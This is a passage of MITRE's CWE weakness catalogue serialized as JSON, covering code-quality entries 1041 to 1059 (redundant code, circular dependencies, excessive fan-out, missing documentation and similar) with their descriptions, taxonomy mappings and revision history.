Mechanism","Note":"When the automated recognition is used in a protection mechanism, an attacker may be able to craft inputs that are misinterpreted in a way that grants excess privileges."}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-16"}},{"attr":{"@_External_Reference_ID":"REF-17"}},{"attr":{"@_External_Reference_ID":"REF-15"}},{"attr":{"@_External_Reference_ID":"REF-13"}},{"attr":{"@_External_Reference_ID":"REF-14"}}]},"Notes":{"Note":{"#text":"Further investigation is needed to determine if better relationships exist or if additional organizational entries need to be created.  For example, this issue might be better related to \\"recognition of input as an incorrect type,\\" which might place it as a sibling of CWE-704 (incorrect type conversion).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-03-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"1041":{"attr":{"@_ID":"1041","@_Name":"Use of Redundant Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software has multiple functions, methods, procedures, macros, etc. that\\n\\t\\t\\t\\t\\tcontain the same code.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  For example, if there are two copies of the same code, the programmer might fix a weakness in one copy while forgetting to fix the same weakness in another copy."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-19"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-19"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}}},"1042":{"attr":{"@_ID":"1042","@_Name":"Static Member Data Element outside of a Singleton Class Element","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a member element that is declared as static (but not final), in which\\n\\t\\t\\t\\t\\tits parent class element \\n\\t\\t\\t\\t\\tis not a singleton class - that is, a class element that can be used only once in\\n\\t\\t\\t\\t\\tthe \'to\' association of a Create action.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-3"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-3"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1043":{"attr":{"@_ID":"1043","@_Name":"Data Element Aggregating an Excessively Large Number of Non-Primitive Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a data element that has an excessively large\\n\\t\\t\\t\\t\\tnumber of sub-elements with non-primitive data types such as structures or aggregated objects.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"excessively large\\" may vary for each product or developer, CISQ recommends a default of 5 sub-elements."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1093","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-12"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-12"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1044":{"attr":{"@_ID":"1044","@_Name":"Architecture with Number of Horizontal Layers Outside of Expected Range","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software\'s architecture contains too many - or too few -\\n\\t\\t\\t\\t\\thorizontal layers.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"expected range\\" may vary for each product or developer, CISQ recommends a default minimum of 4 layers and maximum of 8 layers."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-9"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-9"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1045":{"attr":{"@_ID":"1045","@_Name":"Parent Class with a Virtual Destructor and a Child Class without a Virtual Destructor","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A parent class has a virtual destructor method, but the parent has a child class that does not have a virtual destructor.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, since the child might not perform essential destruction operations.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability, such as a memory leak (CWE-401)."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-17"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-17"}},{"attr":{"@_External_Reference_ID":"REF-977"}},{"attr":{"@_External_Reference_ID":"REF-978"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1046":{"attr":{"@_ID":"1046","@_Name":"Creation of Immutable Text Using String Concatenation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software creates an immutable text string using string concatenation operations.","Extended_Description":{"xhtml:p":"When building a string via a looping feature (e.g., a FOR or WHILE loop), the use of += to append to the existing string will result in the creation of a new object with each iteration. This programming pattern can be inefficient in comparison with use of text buffer data elements. This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this could be influenced to create performance problem."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-2"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-2"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1047":{"attr":{"@_ID":"1047","@_Name":"Modules with Circular Dependencies","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains modules in which one module has references that cycle back to itself, i.e., there are circular dependencies.","Extended_Description":{"xhtml:p":["As an example, with Java, this weakness might indicate cycles between packages.","This issue makes it more difficult to maintain the software due to insufficient modularity, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-7"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-13"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-7"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-13"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1048":{"attr":{"@_ID":"1048","@_Name":"Invokable Control Element with Large Number of Outward Calls","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains callable control elements that\\n         contain an excessively large number of references to other\\n         application objects external to the context of the callable,\\n         i.e. a Fan-Out value that is excessively large.","Extended_Description":{"xhtml:p":["While the interpretation of \\"excessively large Fan-Out value\\" may vary for each product or developer, CISQ recommends a default of 5 referenced objects.","This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-4"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-4"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}}},"1049":{"attr":{"@_ID":"1049","@_Name":"Excessive Data Query Operations in a Large Data Table","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs a data query with a large number of joins\\n\\t\\t\\t\\t\\tand sub-queries on a large data table.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"large data table\\" and \\"large number of joins or sub-queries\\" may vary for each product or developer, CISQ recommends a default of 1 million rows for a \\"large\\" data table, a default minimum of 5 joins, and a default minimum of 3 sub-queries."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-4"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-4"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1050":{"attr":{"@_ID":"1050","@_Name":"Excessive Platform Resource Consumption within a Loop","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software has a loop body or loop condition that contains a control element that directly or\\n\\t\\t\\t\\t\\tindirectly consumes platform resources, e.g. messaging, sessions, locks, or file\\n\\t\\t\\t\\t\\tdescriptors.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly.  If an attacker can influence the number of iterations in the loop, then this performance problem might allow a denial of service by consuming more platform resources than intended."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-8"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-8"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1051":{"attr":{"@_ID":"1051","@_Name":"Initialization with Hard-Coded Network Resource Configuration Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software initializes data using hard-coded values that act as network resource identifiers.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, e.g. if it runs in an environment does not use the hard-coded network resource identifiers. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-18"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-18"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"1052":{"attr":{"@_ID":"1052","@_Name":"Excessive Use of Hard-Coded Literals in Initialization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software initializes a data element using a hard-coded\\n\\t\\t\\t\\t\\tliteral that is not a simple integer or static constant element.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to modify or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-3"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-3"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1053":{"attr":{"@_ID":"1053","@_Name":"Missing Documentation for Design","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not have documentation that represents how it is designed.","Extended_Description":{"xhtml:p":"This issue can make it more difficult to understand and maintain the product. It can make it more difficult and time-consuming to detect and/or fix vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}}},"1054":{"attr":{"@_ID":"1054","@_Name":"Invocation of a Control Element at an Unnecessarily Deep Horizontal Layer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code at one architectural layer invokes code that resides\\n\\t\\t\\t\\t\\tat a deeper layer than the adjacent layer, i.e., the invocation skips at least one\\n\\t\\t\\t\\t\\tlayer, and the invoked code is not part of a vertical utility layer that can be referenced from any horizontal layer.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-12"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-12"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1055":{"attr":{"@_ID":"1055","@_Name":"Multiple Inheritance from Concrete Classes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a class with inheritance from more than\\n\\t\\t\\t\\t\\tone concrete class.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1093","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-2"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-2"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1056":{"attr":{"@_ID":"1056","@_Name":"Invokable Control Element with Variadic Parameters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A named-callable or method control element has a signature that\\n\\t\\t\\t\\t\\tsupports a variable (variadic) number of parameters or arguments.","Extended_Description":{"xhtml:p":["This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability.","With variadic arguments, it can be difficult or inefficient for manual analysis to be certain of which function/method is being invoked."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-8"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-8"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1057":{"attr":{"@_ID":"1057","@_Name":"Data Access Operations Outside of Expected Data Manager Component","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a dedicated, central data manager component as required by design, but it contains code that performs data-access operations that do not use this data manager.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly than intended, since the intended central data manager may have been explicitly optimized for performance or other quality characteristics.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-11"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-11"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1058":{"attr":{"@_ID":"1058","@_Name":"Invokable Control Element in Multi-Thread Context with non-Final Static Storable or Member Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a function or method that\\n\\t\\t operates in a multi-threaded environment but owns an unsafe non-final\\n\\t\\t                     static storable or member data element.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-11"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-11"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"1059":{"attr":{"@_ID":"1059","@_Name":"Incomplete Documentation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The documentation, whether on paper or in electronic form, does\\n\\t\\t\\t\\t\\tnot contain descriptions of all the relevant elements of the product, such as\\n\\t\\t\\t\\t\\tits usage, structure, interfaces, design, implementation, configuration,\\n\\t\\t\\t\\t\\toperation, etc.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce 